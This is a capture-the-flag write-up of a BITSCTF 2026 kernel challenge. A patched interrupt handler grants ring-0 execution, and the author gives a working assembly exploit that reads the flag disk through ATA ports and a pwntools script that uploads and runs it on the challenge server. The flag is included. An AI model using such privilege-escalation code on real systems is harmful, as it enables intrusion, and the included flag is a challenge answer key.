BITSCTF 2026 - Promotion - Binary Exploitation Writeup

Category: Binary Exploitation

Flag: BITSCTF{pr0m0710n5_4r3_6r347._1f_1_0nly_h4d_4_j0b...}

Challenge Description#

Given promotion_for_players.zip with bzImage, rootfs.cpio.gz, run.sh, diff.txt. Remote: nc 20.193.149.152 1337

From run.sh: flag attached as block device via -hda /challenge/flag.txt

Analysis#

Kernel patch in diff.txt introduces interrupt vector 0x81:

1
pushq %rax
2
movq %cs, %rax
3
movq %rax, 16(%rsp)
4
xorq %rax, %rax
5
movq %rax, 40(%rsp)
6
popq %rax
7
iretq

This intentionally corrupts iret-frame fields. When userland executes int $0x81, we get kernel-level control.

Exploitation#

Trigger int $0x81
Immediately disable interrupts (cli) to keep execution stable
Perform ATA PIO read of LBA0 from primary disk via I/O ports (command/status: 0x1f7, data: 0x1f0)
Print bytes to serial COM1 (0x3f8)

File used: exploit_ring0.S

1
.global _start
2
.section .text
3

4
_start:
5
    int $0x81
6
    cli
7

8
wait_bsy:
9
    mov $0x1f7, %dx
10
    inb %dx, %al
11
    test $0x80, %al
12
    jnz wait_bsy
13

14
    mov $0xe0, %al
15
    mov $0x1f6, %dx
16
    outb %al, %dx
17

18
    mov $1, %al
19
    mov $0x1f2, %dx
20
    outb %al, %dx
21

22
    xor %al, %al
23
    mov $0x1f3, %dx
24
    outb %al, %dx
25
    mov $0x1f4, %dx
26
    outb %al, %dx
27
    mov $0x1f5, %dx
28
    outb %al, %dx
29

30
    mov $0x20, %al
31
    mov $0x1f7, %dx
32
    outb %al, %dx
33

34
wait_drq:
35
    mov $0x1f7, %dx
36
    inb %dx, %al
37
    test $0x08, %al
38
    jz wait_drq
39

40
    mov $256, %ecx
41

42
read_loop:
43
    mov $0x1f0, %dx
44
    inw %dx, %ax
45

46
    mov %al, %bl
47
    cmp $0, %bl
48
    je done
49
    cmp $0x0a, %bl
50
    je done
51
    cmp $0x0d, %bl
52
    je done
53
    cmp $0x20, %bl
54
    jb low_dot
55
    cmp $0x7e, %bl
56
    ja low_dot
57
    jmp low_send
58
low_dot:
59
    mov $'.', %bl
60
low_send:
61
wait_tx1:
62
    mov $0x3fd, %dx
63
    inb %dx, %al
64
    test $0x20, %al
65
    jz wait_tx1
66
    mov %bl, %al
67
    mov $0x3f8, %dx
68
    outb %al, %dx
69

70
    mov %ah, %bl
71
    cmp $0, %bl
72
    je done
73
    cmp $0x0a, %bl
74
    je done
75
    cmp $0x0d, %bl
76
    je done
77
    cmp $0x20, %bl
78
    jb high_dot
79
    cmp $0x7e, %bl
80
    ja high_dot
81
    jmp high_send
82
high_dot:
83
    mov $'.', %bl
84
high_send:
85
wait_tx2:
86
    mov $0x3fd, %dx
87
    inb %dx, %al
88
    test $0x20, %al
89
    jz wait_tx2
90
    mov %bl, %al
91
    mov $0x3f8, %dx
92
    outb %al, %dx
93

94
    loop read_loop
95

96
done:
97
    mov $'\n', %bl
98
wait_tx3:
99
    mov $0x3fd, %dx
100
    inb %dx, %al
101
    test $0x20, %al
102
    jz wait_tx3
103
    mov %bl, %al
104
    mov $0x3f8, %dx
105
    outb %al, %dx
106

107
hang:
108
    hlt
109
    jmp hang

Compile:

1
gcc -nostdlib -static -s -o exploit_ring0 exploit_ring0.S

Upload and execute via base64:

1
# !/usr/bin/env python3
2
from pwn import *
3
import base64
4
import textwrap
5

6
HOST, PORT = "20.193.149.152", 1337
7
BIN_PATH = "./exploit_ring0"
8

9
def main():
10
    payload_b64 = base64.b64encode(open(BIN_PATH, "rb").read()).decode()
11
    chunks = textwrap.wrap(payload_b64, 76)
12

13
    io = remote(HOST, PORT, timeout=10)
14

15
    boot = b""
16
    while b"~ $" not in boot and b"/ $" not in boot:
17
        d = io.recv(timeout=0.5)
18
        if d:
19
            boot += d
20

21
    io.sendline(b"cat >/tmp/e.b64 <<'EOF'")
22
    for line in chunks:
23
        io.sendline(line.encode())
24
    io.sendline(b"EOF")
25

26
    io.sendline(b"base64 -d /tmp/e.b64 >/tmp/e")
27
    io.sendline(b"chmod +x /tmp/e")
28
    io.sendline(b"/tmp/e")
29

30
    out = b""
31
    for _ in range(300):
32
        d = io.recv(timeout=0.2)
33
        if d:
34
            out += d
35
            if b"}" in out:
36
                break
37

38
    print(out.decode("latin1", errors="ignore"))
39
    io.close()
40

41
if __name__ == "__main__":
42
    main()

Flag:

1
BITSCTF{pr0m0710n5_4r3_6r347._1f_1_0nly_h4d_4_j0b...}